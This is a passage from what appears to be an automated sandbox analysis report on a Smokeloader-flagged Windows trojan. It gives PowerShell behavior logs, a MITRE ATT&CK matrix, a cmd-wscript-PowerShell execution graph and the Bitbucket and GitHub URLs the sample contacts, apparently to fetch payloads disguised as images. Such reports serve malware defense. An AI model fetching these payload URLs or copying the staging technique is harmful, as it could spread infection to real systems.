        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E88964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,4_2_00007FF7E6E88964
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E82C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,4_2_00007FF7E6E82C54
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information111
        Scripting        		Valid Accounts12
        Native API        		111
        Scripting        		1
        DLL Side-Loading        		1
        Software Packing        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Timestomp        		LSASS Memory2
        File and Directory Discovery        		Remote Desktop ProtocolData from Removable Media21
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        Command and Scripting Interpreter        		1
        Registry Run Keys / Startup Folder        		11
        Process Injection        		1
        DLL Side-Loading        		Security Account Manager16
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        PowerShell        		Login Hook1
        Registry Run Keys / Startup Folder        		1
        Masquerading        		NTDS1
        Security Software Discovery        		Distributed Component Object ModelInput Capture3
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
        Virtualization/Sandbox Evasion        		LSA Secrets1
        Process Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Access Token Manipulation        		Cached Domain Credentials21
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Process Injection        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576152 Sample: GdGXG0bnxH.exe Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 28 s3-w.us-east-1.amazonaws.com 2->28 30 s3-1-w.amazonaws.com 2->30 32 3 other IPs or domains 2->32 38 Suricata IDS alerts for network traffic 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 11 other signatures 2->44 10 GdGXG0bnxH.exe 1 3 2->10         started        signatures3 process4 process5 12 cmd.exe 3 2 10->12         started        process6 14 wscript.exe 1 12->14         started        17 conhost.exe 12->17         started        signatures7 52 Suspicious powershell command line found 14->52 54 Wscript starts Powershell (via cmd or directly) 14->54 56 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->56 58 Suspicious execution chain found 14->58 19 powershell.exe 7 14->19         started        process8 signatures9 46 Suspicious powershell command line found 19->46 48 Found suspicious powershell code related to unpacking or dynamic code loading 19->48 22 powershell.exe 14 24 19->22         started        26 conhost.exe 19->26         started        process10 dnsIp11 34 raw.githubusercontent.com 185.199.109.133, 443, 49701 FASTLYUS Netherlands 22->34 36 bitbucket.org 185.166.143.50, 443, 49700, 49728 AMAZON-02US Germany 22->36 50 Loading BitLocker PowerShell Module 22->50 signatures12

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        GdGXG0bnxH.exe39%ReversingLabsWin64.Trojan.Smokeloader

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        s3-w.us-east-1.amazonaws.com
        		16.182.39.201
        		truefalse
          		high
          bitbucket.org
          		185.166.143.50
          		truefalse
            		high
            raw.githubusercontent.com
            		185.199.109.133
            		truefalse
              		high
              bbuseruploads.s3.amazonaws.com
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611false
                  		high
                  https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpgfalse
                    		high
                    https://bitbucket.org/eqweqwt/wqeqwfs/downloads/agchIkI.txtfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://bbuseruploads.s3.amazonaws.compowershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netpowershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
